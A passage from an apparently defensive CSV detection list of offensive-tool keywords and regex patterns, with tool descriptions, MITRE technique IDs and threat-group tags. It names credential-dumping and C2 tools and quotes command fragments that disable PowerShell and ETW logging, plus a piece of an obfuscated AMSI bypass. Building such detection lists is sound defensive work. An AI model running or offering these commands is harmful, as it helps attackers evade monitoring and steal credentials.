A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58562" "*set_shellcode",".{0,1000}set_shellcode","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","58563" "*set_svchost_callstack*",".{0,1000}set_svchost_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58564" "*set_wmi_callstack*",".{0,1000}set_wmi_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58565" "*set_wmiconfig \*",".{0,1000}set_wmiconfig\s\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58566" "*SeTakeOwnershipPrivilegePoC.exe*",".{0,1000}SeTakeOwnershipPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such as SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58604" "*setc_webshell*",".{0,1000}setc_webshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","58605" "*SeTcbPrivilegePoC.exe*",".{0,1000}SeTcbPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such as SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58607" "*Set-Content $PS2exePath*",".{0,1000}Set\-Content\s\$PS2exePath.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","58610" "*Set-Content -Path psexec.exe*",".{0,1000}Set\-Content\s\-Path\spsexec\.exe.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58611" "*Set-Content -Path server.exe*",".{0,1000}Set\-Content\s\-Path\sserver\.exe.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58612" "*Set-Content -Path SharpRDP.exe*",".{0,1000}Set\-Content\s\-Path\sSharpRDP\.exe.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - 
TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58613" "*Set-Content -Path SharpWeb.exe*",".{0,1000}Set\-Content\s\-Path\sSharpWeb\.exe.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58614" "*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58615" "*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58616" "*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58617" "*setdes linux x64 blahblahblah*",".{0,1000}setdes\slinux\sx64\sblahblahblah.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#content","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","58618" "*Set-DesktopACLToAllow*",".{0,1000}Set\-DesktopACLToAllow.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58619" "*Set-DesktopACLToAllowEveryone*",".{0,1000}Set\-DesktopACLToAllowEveryone.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58620" "*Set-DomainObject -Identity 'CN=Allowed RODC Password Replication Group* -Set @{'member'=@(*",".{0,1000}Set\-DomainObject\s\-Identity\s\'CN\=Allowed\sRODC\sPassword\sReplication\sGroup.{0,1000}\s\-Set\s\@\{\'member\'\=\@\(.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","58621" "*Set-DomainObject -Identity 
'CN=Denied RODC Password Replication Group* -Clear 'member'*",".{0,1000}Set\-DomainObject\s\-Identity\s\'CN\=Denied\sRODC\sPassword\sReplication\sGroup.{0,1000}\s\-Clear\s\'member\'.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","58622" "*Set-DomainObject -Identity 'CN=RODC* -Set @{'msDS-NeverRevealGroup'=@(*",".{0,1000}Set\-DomainObject\s\-Identity\s\'CN\=RODC.{0,1000}\s\-Set\s\@\{\'msDS\-NeverRevealGroup\'\=\@\(.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","58623" "*Set-DomainObject*",".{0,1000}Set\-DomainObject.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58624" "*Set-EtwTraceProvider -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}' -AutologgerName 'EventLog-Application' -Property 0x11*",".{0,1000}Set\-EtwTraceProvider\s\-Guid\s\'\{A0C1853B\-5C40\-4B15\-8766\-3CF1C58F985A\}\'\s\-AutologgerName\s\'EventLog\-Application\'\s\-Property\s0x11.{0,1000}","offensive_tool_keyword","Set-EtwTraceProvider","disables Microsoft-Windows-PowerShell event logging","T1070.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58625" "*Seth by SySS 
GmbH*",".{0,1000}Seth\sby\sSySS\sGmbH.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","58628" "*seth.py * -j INJECT*",".{0,1000}seth\.py\s.{0,1000}\s\-j\sINJECT.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","58629" "*Seth-master.zip*",".{0,1000}Seth\-master\.zip.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","58630" "*SetInitialCheckIn updates the time stamp that the Agent first successfully connected to the Merlin server*",".{0,1000}SetInitialCheckIn\supdates\sthe\stime\sstamp\sthat\sthe\sAgent\sfirst\ssuccessfully\sconnected\sto\sthe\sMerlin\sserver.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","58631" "*sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 
'uZx'*",".{0,1000}sET\-ItEM\s\(\s\'V\'\+\'aR\'\s\+\s\s\'IA\'\s\+\s\'blE\:1q2\'\s\s\+\s\'uZx\'.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass Obfuscation example for copy-paste purposes","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58632" "*Set-ItemProperty * ""EnableModuleLogging"" -Value 0*",".{0,1000}Set\-ItemProperty\s.{0,1000}\s\""EnableModuleLogging\""\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58633" "*Set-ItemProperty * ""EnableScriptBlockLogging"" -Value 0*",".{0,1000}Set\-ItemProperty\s.{0,1000}\s\""EnableScriptBlockLogging\""\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58634" "*Set-ItemProperty -Path ""HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging"" -Name ""EnableModuleLogging"" -Value 0*",".{0,1000}Set\-ItemProperty\s\-Path\s\""HKLM\:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging\""\s\-Name\s\""EnableModuleLogging\""\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A","58636" "*set-killdate *",".{0,1000}set\-killdate\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used 
to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58638" "*Set-Killdate*",".{0,1000}Set\-Killdate.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58639" "*setLoaderFlagZero*",".{0,1000}setLoaderFlagZero.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","58640" "*Set-MacAttribute.ps1*",".{0,1000}Set\-MacAttribute\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58641" "*Set-MacroSecurityOff *",".{0,1000}Set\-MacroSecurityOff\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","58642" 
"*Set-MacroSecurityOff.ps1*",".{0,1000}Set\-MacroSecurityOff\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","58643" "*Set-MasterBootRecord *",".{0,1000}Set\-MasterBootRecord\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik 
